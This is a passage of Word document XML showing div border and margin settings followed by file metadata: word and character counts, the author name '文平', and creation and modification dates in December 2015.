        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="667756422">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1246570063">
              <w:marLeft w:val="300"/>
              <w:marRight w:val="300"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="150"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="24" w:space="0" w:color="CAD9EA"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="CAD9EA"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CAD9EA"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="CAD9EA"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1422724977">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3681</Words>
  <Characters>20988</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>174</Lines>
  <Paragraphs>49</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>24620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文平</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>文平</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-12-09T11:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-12-09T11:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>